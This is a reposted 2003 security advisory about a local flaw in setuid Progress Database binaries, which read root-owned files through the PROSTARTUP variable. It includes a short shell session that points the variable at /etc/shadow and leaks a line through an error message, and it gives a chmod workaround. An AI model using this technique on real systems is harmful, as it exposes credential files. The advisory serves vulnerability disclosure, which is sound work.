logo Home

Untitled Document

Home > Archives Advisories > Articles

Untitled Document

Untitled Document

Progress PROSTARTUP Root Owned File Reading Vulnerability
Date: 2003-04-05

Author : KF <dotslash@snosoft.com>

Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com

Our Mission: ********************************************
Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer.

Quick Summary:
Advisory Number : SRT2003-04-02-1735
Product : Progress Database
Version : Versions 7 to 9
Vendor : progress.com
Class : local
Criticality : Medium to Low
Operating System(s) : Linux, SunOS, SCO, TRU64, *nix

High Level Explination
High Level Description : Error messages can provide root owned data What to do : chmod -s all suid binaries in /usr/dlc

Technical Details
Proof Of Concept Status : No PoC is needed.
Low Level Description :

The Progress Database reads configuration files as the root user. No checks are made to verify that the user running thr program has the permission to read the configuration file. A user can simply specify a root owned file and cause an error message to be generated to view the file contents. Most versions beyond v6 appear to be affected.

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily on the machine I chose to exploit the line that was read from the shadow file did not have an encrypted hash. This however is not always the case.

Patch or Workaround : chmod -s all suid binaries in the $DLC folder Vendor Status : vendor has been notified and is working on a fix Bugtraq URL : to be assigned

This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.


arrowSearch Advisories


Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.


About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy